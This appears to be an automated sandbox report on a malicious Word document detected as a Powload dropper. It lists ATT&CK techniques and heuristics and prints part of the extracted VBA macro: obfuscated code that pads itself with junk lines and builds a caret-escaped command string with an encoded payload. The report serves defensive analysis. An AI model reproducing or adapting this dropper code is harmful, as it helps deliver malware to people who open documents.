Verdict: MALICIOUS
Risk Score: 202

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File

Malware Insights
The sample contains a critical heuristic firing for a Shell() call within VBA macros, indicating an attempt to execute arbitrary commands. The AutoOpen macro marker further suggests automatic execution upon opening. The VBA script appears to be constructing a command-line string, likely for downloading and executing a second-stage payload, as suggested by the ClamAV detection name 'Doc.Dropper.Powload'.
Heuristics (6)

- ClamAV: Doc.Dropper.Powload-6666836-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Powload-6666836-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9905 bytes |

SHA-256 (macros.bas): 7944d4030b5acf5ab97b1c82dd636f929f969cb7d13b86931784772d09fb3ecc
Preview: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "HqZXCzBjYUosNZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "hzhBlkt"
Function pZbRcqTzqDt()
On _
Error _
Resume _
Next
Hour KZplB * azmRaW / 4736 / SphwNh
Hour 3081 / Fnhwp * 98538 * ZTvtWc
Hour 79248 * cPOEr
zZpcjWqV = "md " + "/" + "V^:^ON/" + "C" + Chr(0 + 2 + 0 + 3 + 29) + "^" + "s^e^"
Hour 74518 * KZjHiq
Hour 17765 * kzUlk
Hour 9867 / GaIEpS / RtwLU * oEuSf
Hour 60726 / iJhAQ
SLpVhn = "t ^f" + "^M=A" + "^AC" + "^" + "A"
Hour IdZUH * qlsio
Hour tZTEZE * RWErQ / 60856 * FKzAs
Hour pEENZ * LLiwKc
itOQwVNTt = "^" + "g^A^AI^" + "AAC" + "A^g^A^" + "AI^A" + "^" + "ACA^g" + "A^A^I" + "^AAC^" + "A^gA" + "AI^A^AC" + "A"
Hour 85309 * ZhEbwk
Hour dwURzI * uHLwNJ
Hour 37370 * ouUvG
Hour 91834 * sKRsb / MaYrr / lOtlY
wICXBF = "gAA^IA^" + "ACAg" + "^AQ^" + "fA^0" + "H^A^7^" + "BA^aA^" + "M^G^A" + "0" + "B^Q^Y^" + "AMGA9B" + "^"
Hour duOjnC * 32315 / 59202 * OcrioR
Hour 56526 / JrKGpv / dUwbXZ * coziM
EajOXIHVVFO = "wO^A" + "s" + "G^AhBQZ" + "AI" + "HAi^B" + "w^O" + "^" + "A^4^G" + "A1^B" + "g^e^" + "A^QC^Ag"
pZbRcqTzqDt = zZpcjWqV + SLpVhn + itOQwVNTt + wICXBF + EajOXIHVVFO
Hour tZwii * jvfLYK * wdtoN * fYcZX
Hour VzXIUT / PWimG
Hour 87949 / Ttfiw / LONrj * tdQzaD
Hour 33882 * Hkohs / OZrHH * HsHfww
End Function
Function juFKY()
On _
Error _
Resume _
Next
Hour 17892 * ksUlF * 65696 * 21906
Hour XWrFwz / vHiOcK * iuoiE / 18889
bQiAWDnz = "A" + "Qb" + "^" + "A^U^G" + "A0^B" + "Q^S^A0C"
Hour OFHMbM * NwjUM
Hour 31768 / vXndAb / SGIVzj / hFmVA
Hour 23607 / cZhtz / hRfQYP / FKcBl
Hour LHLid * RCJOv
YjdTi = "Al^B^" + "wa^A" + "^" + "8G" + "A^2^" + "B^" + "g" + "bAk" + "^EA^7AQ" + "K"
Hour XwaOfb * bvJOHM / jMJZwB * wuWCNV
Hour zamWu * LvsRpz
Hour 55050 / 15880 / 75326 * TPfHQ
Hour wiPTUn * aWjocW
GzYfmH = "^A4GA" + "^1^B^" + "geA^Q" + "CAg^AA^" + "L^"
Hour 16018 / SOPvC
Hour YEDMR / Yowbz / rEDlms * 15928
McZZSccJzOB = "A8^" + "GA^p^Bg" + "T^A^QCA" + "o^AQ^" + "Z^A^w" + "^GAp^B^" + "g"
Hour 19232 * 28750
Hour 82833 * LYPOZ
Hour ijBJz / OLuUXv
pXIhAQmc = "R^" + "AQ^G^" + "Ah^Bwb" + "A^w" + "GA^u^"
Hour 55671 / aUaiQF / 30301 * 40812
Hour 12269 / pzWDRh * 9900 / nPcqi
Hour NWvQBS / nhMsd * BitVjw * hfrtU
CYDlvsGprlD = "B" + "wd^A" + "8^G" + "A^E^" + "B^" + "gL^" + "AQ^FA^" + "a^BQ"
Hour 43604 * JiqjQ
Hour 45023 * jhBQW / 39003 / 67252
Hour 70768 / zirNQ / vjwVop / 82198
Hour iZEXjj / PNhiB / 92218 * 510
Hour IYTwSw / BiAIm / 9131 * aNPzZ
EBKkn = "VAQ" + "CA^7B" + "^Q^e^A" + "^I^HA0B" + "weA^kC" + "^AB^B^w"
Hour 85177 / qkKia
Hour 88045 * 66826
Hour 81990 * YIZsR
Hour CtXjwS / zcNNH
aiIiaPwJjF = "V^A^Q^" + "E^AkAA" + "I^A" + "4G^" + "A" + "^p^BAIA" + "8^G^" + "Ap^B^" + "g^TAQ"
Hour 35779 / MBJhF / Nfiiq / KikSn
Hour pBFJI * rvZmD * RCjSf * lJjVJ
Hour lUBbWv / YOhoH / OrZCUu / hwNmjR
Hour oFVbGN * ifiUs / 14935 / oCqlsj
DZXBVvP = "C^" + "A" + "^oA^A^a" + "^AMG^Ah" + "^" + "B^Q^" + "ZA" + "I^H"
Hour 89824 / 62643 / oHATAZ / qObHTm
ObcwPbsjjq = "^AvB" + "^" + "gZAsD" + "^AnA^QZ" + "A^g^H^A" + "^lB^g" + "^L^A" + "cCAr" + "^A"
juFKY = bQiAWDnz + YjdTi + GzYfmH + McZZSccJzOB + pXIhAQmc + CYDlvsGprlD + EBKkn + aiIiaPwJjF + DZXBVvP + ObcwPbsjjq
Hour oGOsF / 49793
Hour ZLQiX / 74257
Hour 44610 * fNadbj
Hour 57259 * lzzdvq
End Function
Function wUdRSqs()
On _
Error _
Resume _
Next
Hour LffJBd / zjNzk / 69488 * wojtq
Hour UizXBO / itLnkp / dlAEB / dUQLsH
FpAcmiRcsJ = "g^dAU^F" + "AzB" + "AJ^AsCA" + "nA^A^" + "X"
Hour fdjLD / CnGRzM * bbwRW * UFAcjK
Hour afjUSz * mfujM
CzThirVjkzE = "AcC^ArA" + "^wYA^k^" + "GAs^B" + "^g" + "Y^A" + "^U^H^Aw" + "Bg^" + "OAY^H^" + "A^u^" + "B" + "Q^Z^" + "A^QC^A"
Hour 95436 * DAXwiJ
DEWvjoYWn = "9" + "A^g" + "^bA" + "^UH^" + "A6^BA"
Hour ERpmYP / ... (truncated)
```